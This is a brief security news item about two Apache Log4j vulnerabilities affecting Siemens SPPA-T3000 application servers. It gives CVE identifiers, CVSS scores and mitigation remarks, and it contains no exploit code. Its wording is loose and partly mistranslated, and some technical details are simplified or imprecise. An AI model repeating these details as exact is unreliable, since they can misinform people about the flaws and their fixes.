A cybersecurity report notes that Siemens SPPA-T3000 implementations are vulnerable to remote code execution (RCE) attacks due to the presence of flaws in the Apache Log4j utility. According to the report, these are critical flaws and there are publicly available exploits for each, so affected users should remain aware of this report.

Below is a brief description of each reported flaws, in addition to their tracking keys and scores according to the Common Vulnerability Scoring System (CVSS).

CVE-2021-44228: The improper input validation when processing LDAP requests would allow remote threat actors sending specially crafted requests to the affected application and run arbitrary code on the target system.

This is a high severity vulnerability and received a CVSS score of 9.8/10, as it would allow hackers to take control of compromised implementations.

CVE-2021-45046: Implementing an incomplete patch in Apache Log4j 2.15.0, intended to fix flaw CVE-2021-44228 would allow remote hackers to control over thread context map (MDC) input data when the registry configuration uses a non-default pattern layout with a context lookup (for example $${ctx:loginId}) pass malicious data using a JNDI search pattern and perform a denial of service (DoS) attack.

Apache Log4j 2.15.0 restricts JNDI LDAP searches to localhost by default. Remember that previous configuration-related mitigations such as setting the system property ‘log4j2.noFormatMsgLookup’ to ‘true’ do not work to mitigate the risk of exploitation.

The report assures theses flaws affect all versions of SSPA-T3000 Application Server.

Vulnerabilities are being exploited in the wild by unauthenticated remote threat actors, plus there are no security patches to mitigate the risk of exploitation. Users of affected deployments are encouraged to stay on top of any updates about flaws in Log4j.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.